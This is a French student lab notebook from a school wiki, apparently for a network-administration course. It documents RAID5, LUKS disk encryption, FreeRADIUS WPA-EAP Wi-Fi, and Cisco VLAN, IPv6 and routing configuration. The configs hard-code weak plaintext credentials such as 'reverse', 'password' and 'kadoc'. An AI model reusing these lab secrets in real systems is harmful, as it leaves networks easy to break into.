Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.5.5&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.5.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre routeur avec la connexion à la borne Wifi.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35828</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35828"/>
				<updated>2016-12-10T10:44:45Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Présentation du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
